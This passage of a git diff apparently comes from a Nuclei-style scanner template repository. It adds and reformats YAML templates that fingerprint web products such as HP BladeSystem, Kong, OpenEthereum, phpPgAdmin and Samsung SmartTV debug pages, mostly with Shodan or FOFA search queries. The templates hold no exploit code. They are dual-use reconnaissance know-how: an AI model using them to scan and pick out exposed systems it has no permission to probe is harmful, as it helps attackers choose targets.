+id: hp-blade-system
 
-info:
-  name: HP BladeSystem Onboard Administrator
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-query: http.title:"HP BladeSystem"
-  tags: panel,hp
+info:
+  name: HP BladeSystem Onboard Administrator
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-query: http.title:"HP BladeSystem"
+  tags: panel,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>HP BladeSystem Onboard Administrator</title>"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>HP BladeSystem Onboard Administrator</title>"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/hp-media-vault-detect.yaml b/technologies/hp-media-vault-detect.yaml
index fa2886e465..8731f6e1bc 100644
--- a/technologies/hp-media-vault-detect.yaml
+++ b/technologies/hp-media-vault-detect.yaml
@@ -1,25 +1,25 @@
-id: hp-media-vault-detect
+id: hp-media-vault-detect
 
-info:
-  name: HP Media Vault Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: 'app="HP-Media-Vault-Media-Server"'
-  tags: tech,hp
+info:
+  name: HP Media Vault Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: 'app="HP-Media-Vault-Media-Server"'
+  tags: tech,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>HP Media Vault"
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>HP Media Vault"
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/ibm/ibm-http-server.yaml b/technologies/ibm/ibm-http-server.yaml
index a0dbd31cca..f5423bcd5f 100644
--- a/technologies/ibm/ibm-http-server.yaml
+++ b/technologies/ibm/ibm-http-server.yaml
@@ -4,8 +4,8 @@ info:
   name: Default IBM HTTP Server
   author: dhiyaneshDK,pussycat0x
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22IBM-HTTP-Server%22
+  metadata:
+    shodan-query: http.title:"IBM-HTTP-Server"
   tags: tech,ibm
 
 requests:
diff --git a/technologies/interactsh-server.yaml b/technologies/interactsh-server.yaml
index 85ecba7080..b1211c9822 100644
--- a/technologies/interactsh-server.yaml
+++ b/technologies/interactsh-server.yaml
@@ -4,6 +4,9 @@ info:
   name: Interactsh Server
   author: pdteam
   severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"Interactsh Server"
   tags: tech,interactsh
 
 requests:
@@ -11,14 +14,19 @@ requests:
     path:
       - "{{BaseURL}}"
 
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<h1> Interactsh Server </h1>"
+          - "Interactsh Server"
+
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex
         group: 1
         regex:
           - '<b>(.*)<\/b> server'
-          - 'from <b>(.*)<\/b>'
\ No newline at end of file
+          - 'from <b>(.*)<\/b>'
diff --git a/technologies/intercom.yaml b/technologies/intercom.yaml
new file mode 100644
index 0000000000..bec3adb077
--- /dev/null
+++ b/technologies/intercom.yaml
@@ -0,0 +1,20 @@
+id: intercom
+
+info:
+  name: Intercom widget detection
+  author: tess
+  severity: info
+  tags: intercom,tech
+  reference: https://www.intercom.com
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 3
+    matchers:
+      - type: word
+        words:
+          - 'intercom'
\ No newline at end of file
diff --git a/technologies/jhipster-detect.yaml b/technologies/jhipster-detect.yaml
new file mode 100644
index 0000000000..7052e2903a
--- /dev/null
+++ b/technologies/jhipster-detect.yaml
@@ -0,0 +1,27 @@
+id: jhipster-detect
+
+info:
+  name: JHipster Detect
+  author: righettod
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"JHipster"
+  tags: tech,jhipster
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/i18n/en.json'
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'JHipster'
+          - '@jhipster'
+          - 'Welcome, Java Hipster!'
+          - 'jhipster-error'
+        condition: or
diff --git a/technologies/json-server.yaml b/technologies/json-server.yaml
new file mode 100644
index 0000000000..bf654027af
--- /dev/null
+++ b/technologies/json-server.yaml
@@ -0,0 +1,27 @@
+id: json-server
+
+info:
+  name: Json Server
+  author: DhiyaneshDK
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/4550
+  metadata:
+    verified: true
+    shodan-query: title:"JSON Server"
+  tags: exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title>JSON Server</title>"
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/kong-detect.yaml b/technologies/kong-detect.yaml
index dc99ead28d..6e9833bfee 100644
--- a/technologies/kong-detect.yaml
+++ b/technologies/kong-detect.yaml
@@ -2,7 +2,7 @@ id: kong-detect
 
 info:
   name: Detect Kong
-  author: geeknik
+  author: geeknik,joshlarsen
   severity: info
   description: The Cloud-Native API Gateway
   reference:
@@ -14,16 +14,18 @@ requests:
     path:
       - "{{BaseURL}}"
 
-    matchers-condition: and
     matchers:
-
-      - type: regex
+      - type: word
         part: header
-        regex:
-          - "[Ss]erver: [Kk]ong+"
+        words:
+          - "server: kong"
+          - "x-kong-response-latency"
+          - "x-kong-upstream-latency"
+          - "x-kong-proxy-latency"
+        condition: or
+        case-insensitive: true
 
     extractors:
       - type: kval
-        part: header
         kval:
           - server
diff --git a/technologies/landesk/landesk-csa.yaml b/technologies/landesk/landesk-csa.yaml
new file mode 100644
index 0000000000..06661dcf6a
--- /dev/null
+++ b/technologies/landesk/landesk-csa.yaml
@@ -0,0 +1,23 @@
+id: landesk-csa
+
+info:
+  name: LANDESK(R) Cloud Services Appliance Detect
+  author: 0xNirvana
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"LANDESK(R)"
+  tags: technology,landesk
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "LANDESK(R)"
+          - "Cloud Services Appliance"
+        condition: and
diff --git a/technologies/landesk/landesk-ma.yaml b/technologies/landesk/landesk-ma.yaml
new file mode 100644
index 0000000000..9b8c53280b
--- /dev/null
+++ b/technologies/landesk/landesk-ma.yaml
@@ -0,0 +1,23 @@
+id: landesk-ma
+
+info:
+  name: LANDESK(R) Management Agent Detect
+  author: 0xNirvana
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"LANDESK(R)"
+  tags: technology,landesk
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "LANDesk(R)"
+          - "Management Agent"
+        condition: and
diff --git a/technologies/magento-detect.yaml b/technologies/magento-detect.yaml
index de461a9837..89800e25b7 100644
--- a/technologies/magento-detect.yaml
+++ b/technologies/magento-detect.yaml
@@ -7,6 +7,9 @@ info:
   description: Identify Magento
   reference:
     - https://devdocs.magento.com/guides/v2.4/graphql/
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
   tags: magento
 
 requests:
diff --git a/technologies/magmi-detect.yaml b/technologies/magmi-detect.yaml
index 359fb9d9d5..6b05a730a4 100644
--- a/technologies/magmi-detect.yaml
+++ b/technologies/magmi-detect.yaml
@@ -4,6 +4,9 @@ info:
   name: MAGMI (Magento Mass Importer) Plugin Detect
   author: dwisiswant0
   severity: info
+  metadata:
+    verified: true
+    shodan-query: http.component:"Magento"
   tags: magento,magmi,plugin
 
 requests:
diff --git a/technologies/matrix-detect.yaml b/technologies/matrix-detect.yaml
new file mode 100644
index 0000000000..cb87bcf210
--- /dev/null
+++ b/technologies/matrix-detect.yaml
@@ -0,0 +1,51 @@
+id: matrix-detect
+
+info:
+  name: Matrix Server Detect
+  author: erethon
+  severity: info
+  description: Detects Matrix servers based on .well-known entries. See https://en.wikipedia.org/wiki/Matrix_(protocol)
+  reference: https://spec.matrix.org/v1.3/server-server-api/#getwell-knownmatrixserver, https://spec.matrix.org/v1.3/client-server-api/#getwell-knownmatrixclient
+  tags: tech,matrix
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.well-known/matrix/server"
+      - "{{BaseURL}}/.well-known/matrix/client"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "m."
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body
+        name: server-to-server
+        json:
+          - '."m.server" | select( . != null )'
+
+      - type: json
+        part: body
+        name: client-homeserver
+        json:
+          - '."m.homeserver" | .base_url | select( . != null )'
+
+      - type: json
+        part: body
+        name: identity-server
+        json:
+          - '."m.identity_server" | .base_url | select( . != null )'
diff --git a/technologies/microsoft/default-iis7-page.yaml b/technologies/microsoft/default-iis7-page.yaml
index 50ffdc4d40..13347df733 100644
--- a/technologies/microsoft/default-iis7-page.yaml
+++ b/technologies/microsoft/default-iis7-page.yaml
@@ -4,8 +4,8 @@ info:
   name: IIS-7 Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22IIS7%22
+  metadata:
+    shodan-query: http.title:"IIS7"
   tags: tech,iis
 
 requests:
diff --git a/technologies/microsoft/default-microsoft-azure-page.yaml b/technologies/microsoft/default-microsoft-azure-page.yaml
index 543e5f393e..43eafe75ec 100644
--- a/technologies/microsoft/default-microsoft-azure-page.yaml
+++ b/technologies/microsoft/default-microsoft-azure-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Microsoft Azure Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Microsoft+Azure+App+Service+-+Welcome%22
+  metadata:
+    shodan-query: http.title:"Microsoft Azure App Service - Welcome"
   tags: tech,azure,microsoft
 
 requests:
diff --git a/technologies/microsoft/default-windows-server-page.yaml b/technologies/microsoft/default-windows-server-page.yaml
index 01bc076291..f090d8cbb1 100644
--- a/technologies/microsoft/default-windows-server-page.yaml
+++ b/technologies/microsoft/default-windows-server-page.yaml
@@ -4,8 +4,8 @@ info:
   name: IIS Windows Server Default Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22IIS+Windows+Server%22
+  metadata:
+    shodan-query: http.title:"IIS Windows Server"
   tags: tech,windows,iis
 
 requests:
diff --git a/technologies/nextcloud-owncloud-detect.yaml b/technologies/nextcloud-owncloud-detect.yaml
new file mode 100644
index 0000000000..b1e1445be3
--- /dev/null
+++ b/technologies/nextcloud-owncloud-detect.yaml
@@ -0,0 +1,29 @@
+id: owncloud-status-page
+
+info:
+  name: Owncloud StatusPage detection
+  author: myztique
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"owncloud"
+  tags: tech,owncloud,status
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/status.php"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '{"installed":(?:true|false),"maintenance":(?:true|false),"version":"[0-9\.]*","versionstring":"[a-z-A-Z0-9\.]*","edition":"[\d\D]*"}'
+
+    extractors:
+      - type: regex
+        part: body
+        name: version
+        group: 1
+        regex:
+          - '{[\d\D]*"version":"([0-9\.]+)"'
diff --git a/technologies/nexus-detect.yaml b/technologies/nexus-detect.yaml
index 7f3af7d8be..e0a02dcee0 100644
--- a/technologies/nexus-detect.yaml
+++ b/technologies/nexus-detect.yaml
@@ -1,23 +1,23 @@
-id: nexus-detect
+id: nexus-detect
 
-info:
-  name: Nexus Repository Manager (NRM) Instance Detection Template
-  author: righettod
-  severity: info
-  description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor
-  tags: tech,nexus
+info:
+  name: Nexus Repository Manager (NRM) Instance Detection Template
+  author: righettod
+  severity: info
+  description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor
+  tags: tech,nexus
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/service/rest/swagger.json"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Nexus Repository Manager"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/service/rest/swagger.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Nexus Repository Manager"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/nginx/default-nginx-page.yaml b/technologies/nginx/default-nginx-page.yaml
index e3fda60e36..1df496ae5a 100644
--- a/technologies/nginx/default-nginx-page.yaml
+++ b/technologies/nginx/default-nginx-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Nginx Default Test Page
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+nginx%21%22
+  metadata:
+    shodan-query: http.title:"Welcome to nginx!"
   tags: tech,nginx
 
 requests:
diff --git a/technologies/nginx/nginx-linux-page.yaml b/technologies/nginx/nginx-linux-page.yaml
index 021b54e9bb..46f94209f1 100644
--- a/technologies/nginx/nginx-linux-page.yaml
+++ b/technologies/nginx/nginx-linux-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Nginx HTTP Server Amazon Linux
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+Nginx+HTTP+Server+on+Amazon+Linux%22
+  metadata:
+    shodan-query: http.title:"Test Page for the Nginx HTTP Server on Amazon Linux"
   tags: tech,nginx,amazon
 
 requests:
diff --git a/technologies/nimsoft-wasp.yaml b/technologies/nimsoft-wasp.yaml
new file mode 100644
index 0000000000..ab98be84c5
--- /dev/null
+++ b/technologies/nimsoft-wasp.yaml
@@ -0,0 +1,25 @@
+id: nimsoft-wasp
+
+info:
+  name: Nimsoft Wasp Detection
+  author: Nullfuzz
+  severity: info
+  description: Detect Nimsoft Wasp WebPage
+  tags: nimsoft,exposure,tech
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Powered by <b>Nimsoft WASP "
+          - "<title>WASP</title>"
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/oauth2-detect.yaml b/technologies/oauth2-detect.yaml
index dd135e7178..5cd181e726 100644
--- a/technologies/oauth2-detect.yaml
+++ b/technologies/oauth2-detect.yaml
@@ -1,28 +1,28 @@
-id: oauth2-detect
+id: oauth2-detect
 
-info:
-  name: OAuth 2.0 Authorization Server Detection Template
-  author: righettod
-  severity: info
-  description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint
-  tags: tech,oauth
+info:
+  name: OAuth 2.0 Authorization Server Detection Template
+  author: righettod
+  severity: info
+  description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint
+  tags: tech,oauth
 
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/oauth/token"
-
-    body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 401
-          - 400
-        condition: or
-
-      - type: word
-        part: body
-        words:
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/oauth/token"
+
+    body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 401
+          - 400
+        condition: or
+
+      - type: word
+        part: body
+        words:
           - 'error":"invalid_client"'
\ No newline at end of file
diff --git a/technologies/olivetti-crf-detect.yaml b/technologies/olivetti-crf-detect.yaml
index b2aca8edae..830f040334 100644
--- a/technologies/olivetti-crf-detect.yaml
+++ b/technologies/olivetti-crf-detect.yaml
@@ -1,25 +1,25 @@
-id: olivetti-crf-detect
+id: olivetti-crf-detect
 
-info:
-  name: Olivetti CRF Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-query: http.title:"Olivetti CRF"
-  tags: tech,olivetti
+info:
+  name: Olivetti CRF Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-query: http.title:"Olivetti CRF"
+  tags: tech,olivetti
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<TITLE>Olivetti CRF</TITLE>"
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<TITLE>Olivetti CRF</TITLE>"
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/omni-commerce-connect-detect.yaml b/technologies/omni-commerce-connect-detect.yaml
new file mode 100644
index 0000000000..8e5b65be40
--- /dev/null
+++ b/technologies/omni-commerce-connect-detect.yaml
@@ -0,0 +1,24 @@
+id: omni-commerce-connect-detect
+
+info:
+  name: Omni Commerce Connect (OCC) Rest APIs
+  description: The Omni Commerce Connect (OCC) API exposes a broad set of commerce and data services. It enables you to integrate SAP Commerce functionality anywhere in your application landscape.
+  author: TechbrunchFR
+  severity: info
+  reference:
+    - https://help.sap.com/docs/SAP_COMMERCE/e5d7cec9064f453b84235dc582b886da/8c19ab00866910148f87bf32d4a60d38.html?locale=en-US
+  metadata:
+    verified: true
+    shodan-query: title:"Hybris"
+  tags: tech,sap,hybris,omni
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/occ/v2/d2OzBcy"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Base site d2OzBcy doesn't exist"
diff --git a/technologies/openethereum-server-detect.yaml b/technologies/openethereum-server-detect.yaml
new file mode 100644
index 0000000000..3b3fc08776
--- /dev/null
+++ b/technologies/openethereum-server-detect.yaml
@@ -0,0 +1,39 @@
+id: openethereum-server
+
+info:
+  name: OpenEthereum JSON-RPC HTTP Server Detect
+  author: Nullfuzz
+  severity: info
+  description: |
+    OpenEthereum is the fastest, lightest, and most "secure" Ethereum client. By default OpenEthereum runs a JSON-RPC HTTP server on port 8545/TCP
+  reference:
+    - https://github.com/openethereum/openethereum
+    - https://openethereum.github.io/
+  metadata:
+    shodan-query: product:OpenEthereum
+  tags: tech,openethereum,ethereum,web3,blockchain
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Content-Length: 66
+
+        {"method":"web3_clientVersion","params":[],"id":1,"jsonrpc":"2.0"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(all_headers, "application/json")'
+          - 'contains(body, "OpenEthereum")'
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '(v[0-9a-z-_.]+)'
diff --git a/technologies/openresty-detect.yaml b/technologies/openresty-detect.yaml
new file mode 100644
index 0000000000..209e6d455e
--- /dev/null
+++ b/technologies/openresty-detect.yaml
@@ -0,0 +1,27 @@
+id: openresty-detect
+
+info:
+  name: OpenResty detection
+  author: jcockhren
+  severity: info
+  description: Some deployments of OpenResty spill their version numbers.
+  tags: tech,openresty
+  metadata:
+    shodan-query: product:"OpenResty"
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: server
+        words:
+          - "openresty"
+
+    extractors:
+      - type: regex
+        part: header
+        regex:
+          - 'openresty/[0-9.]+'
diff --git a/technologies/openssl-detect.yaml b/technologies/openssl-detect.yaml
new file mode 100644
index 0000000000..0bea8fbbfe
--- /dev/null
+++ b/technologies/openssl-detect.yaml
@@ -0,0 +1,33 @@
+id: openssl-detect
+
+info:
+  name: Openssl Detect
+  author: h4kux,princechaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: OpenSSL
+  tags: tech,openssl
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: server
+        words:
+          - "OpenSSL"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: header
+        regex:
+          - 'OpenSSL\/([0-9.a-z]+)'
diff --git a/technologies/operations-automation-default-page.yaml b/technologies/operations-automation-default-page.yaml
index d5287f7ace..c826a187b9 100644
--- a/technologies/operations-automation-default-page.yaml
+++ b/technologies/operations-automation-default-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Operations Automation Default Page
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+  metadata:
+    shodan-query: http.title:"Operations Automation Default Page"
   tags: tech,default
 
 requests:
diff --git a/technologies/oracle/default-oracle-application-page.yaml b/technologies/oracle/default-oracle-application-page.yaml
index f912f2a0e8..3e27179927 100644
--- a/technologies/oracle/default-oracle-application-page.yaml
+++ b/technologies/oracle/default-oracle-application-page.yaml
@@ -4,8 +4,8 @@ info:
   name: Oracle Application Server Containers
   author: dhiyaneshDk
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22
+  metadata:
+    shodan-query: http.title:"Oracle Application Server Containers"
   tags: tech,oracle
 
 requests:
diff --git a/technologies/oracle/oracle-dbass-detect.yaml b/technologies/oracle/oracle-dbass-detect.yaml
index e44478e162..2b9e8dc8c8 100644
--- a/technologies/oracle/oracle-dbass-detect.yaml
+++ b/technologies/oracle/oracle-dbass-detect.yaml
@@ -1,22 +1,22 @@
-id: oracle-dbass-detect
+id: oracle-dbass-detect
 
-info:
-  name: Oracle DBaaS Monitor Detect
-  author: pussycat0x
-  severity: info
-  tags: oracle,tech
+info:
+  name: Oracle DBaaS Monitor Detect
+  author: pussycat0x
+  severity: info
+  tags: oracle,tech
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/dbaas_monitor/login'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>DBaaS Monitor</title>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/dbaas_monitor/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>DBaaS Monitor</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/oracle/oracle-dbcs.yaml b/technologies/oracle/oracle-dbcs.yaml
index 6f4a9233e9..237dcda967 100644
--- a/technologies/oracle/oracle-dbcs.yaml
+++ b/technologies/oracle/oracle-dbcs.yaml
@@ -1,24 +1,25 @@
-id: oracle-dbcs
+id: oracle-dbcs
 
-info:
-  name: Oracle Database as a Service
-  author: pussycat0x
-  severity: info
-  reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Database+as+a+Service%22
-  tags: oracle,tech
+info:
+  name: Oracle Database as a Service
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-query: http.title:"Oracle Database as a Service"
+  tags: oracle,tech
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Oracle Database as a Service</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Oracle Database as a Service</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/oracle/oracle-http-server-12c.yaml b/technologies/oracle/oracle-http-server-12c.yaml
index 1a4c540dc4..eea06562ae 100644
--- a/technologies/oracle/oracle-http-server-12c.yaml
+++ b/technologies/oracle/oracle-http-server-12c.yaml
@@ -4,8 +4,8 @@ info:
   name: Oracle HTTP Server 12c
   author: dhiyaneshDK
   severity: info
-  reference:
-    - https://www.shodan.io/search?query=http.title%3A%22Oracle+HTTP+Server+12c%22
+  metadata:
+    shodan-query: http.title:"Oracle HTTP Server 12c"
   tags: tech,oracle
 
 requests:
diff --git a/technologies/oracle/oracle-webcenter-sites.yaml b/technologies/oracle/oracle-webcenter-sites.yaml
new file mode 100644
index 0000000000..9e814a20a8
--- /dev/null
+++ b/technologies/oracle/oracle-webcenter-sites.yaml
@@ -0,0 +1,27 @@
+id: oracle-webcenter-sites
+
+info:
+  name: Oracle WebCenter Sites
+  author: leovalcante
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"WebCenter"
+  tags: tech,oracle,webcenter
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/welcome_webcenter.html'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'FOR ORACLE'
+          - 'WebCenter Framework'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/owasp-juice-shop-detected.yaml b/technologies/owasp-juice-shop-detected.yaml
index 03ff105eb2..3147edd7a8 100644
--- a/technologies/owasp-juice-shop-detected.yaml
+++ b/technologies/owasp-juice-shop-detected.yaml
@@ -4,8 +4,8 @@ info:
   name: OWASP Juice Shop
   author: pikpikcu
   severity: info
-  reference:
-    - https://fofa.so/result?qbase64=dGl0bGU9Ik9XQVNQIEp1aWNlIFNob3Ai
+  metadata:
+    fofa-query: title="OWASP Juice Shop"
   tags: tech,owasp
 
 requests:
diff --git a/technologies/phppgadmin-version.yaml b/technologies/phppgadmin-version.yaml
new file mode 100644
index 0000000000..2c062cff29
--- /dev/null
+++ b/technologies/phppgadmin-version.yaml
@@ -0,0 +1,30 @@
+id: phppgadmin-version
+
+info:
+  name: phpPgAdmin version detect
+  author: dr0pd34d
+  severity: info
+  description: phpPgAdmin is a third-party tool for PostgreSQL databases. The version is being rendered in the intro.php file.
+  tags: tech,phppgadmin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/phppgadmin/intro.php"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '<span class="appname">phpPgAdmin</span> <span class="version">.*</span>'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - 'phpPgAdmin.*\(.*\)'
\ No newline at end of file
diff --git a/technologies/projectsend-detect.yaml b/technologies/projectsend-detect.yaml
index 8801efa2f5..bfcea70f12 100644
--- a/technologies/projectsend-detect.yaml
+++ b/technologies/projectsend-detect.yaml
@@ -8,8 +8,8 @@ info:
     - https://www.exploit-db.com/ghdb/7380
     - https://github.com/projectsend/projectsend
   metadata:
-    google-dork: intext:Provided by ProjectSend
-  tags: tech,projectsend
+    google-query: intext:Provided by ProjectSend
+  tags: tech,projectsend,edb
 
 requests:
   - method: GET
diff --git a/technologies/puppet-node-manager-detect.yaml b/technologies/puppet-node-manager-detect.yaml
index be81e5ce0c..ed32a8c60c 100644
--- a/technologies/puppet-node-manager-detect.yaml
+++ b/technologies/puppet-node-manager-detect.yaml
@@ -1,24 +1,24 @@
-id: puppet-node-manager-detect
+id: puppet-node-manager-detect
 
-info:
-  name: Puppet Node Manager
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-dork: 'app="puppet-Node-Manager"'
-  tags: node,tech
+info:
+  name: Puppet Node Manager
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-dork: 'app="puppet-Node-Manager"'
+  tags: node,tech
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Puppet Node Manager</title>'
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Puppet Node Manager</title>'
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/samsung-smarttv-debug.yaml b/technologies/samsung-smarttv-debug.yaml
new file mode 100644
index 0000000000..8d7e496170
--- /dev/null
+++ b/technologies/samsung-smarttv-debug.yaml
@@ -0,0 +1,27 @@
+id: samsung-smarttv-debug
+
+info:
+  name: Samsung SmartTV Debug Config
+  author: pussycat0x
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Debug Config"
+  tags: samsung,tech,iot
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Debug Config</title>'
+          - 'MultiScreen Service'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/sap-spartacus-detect.yaml b/technologies/sap-spartacus-detect.yaml
new file mode 100644
index 0000000000..136a5fc3b2
--- /dev/null
+++ b/technologies/sap-spartacus-detect.yaml
@@ -0,0 +1,23 @@
+id: sap-spartacus-detect
+
+info:
+  name: SAP Spartacus detect
+  author: TechbrunchFR
+  severity: info
+  description: Spartacus is a lean, Angular-based JavaScript storefront for SAP Commerce Cloud that communicates exclusively through the Commerce REST API.
+  reference:
+    - https://github.com/SAP/spartacus
+  metadata:
+    verified: true
+  tags: tech,sap,hybris,angular,spartacus
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - part: body
+        type: word
+        words:
+          - "<cx-storefront"
diff --git a/technologies/sap/sap-netweaver-detect.yaml b/technologies/sap/sap-netweaver-detect.yaml
index 6f43c6ff6a..64926c944a 100644
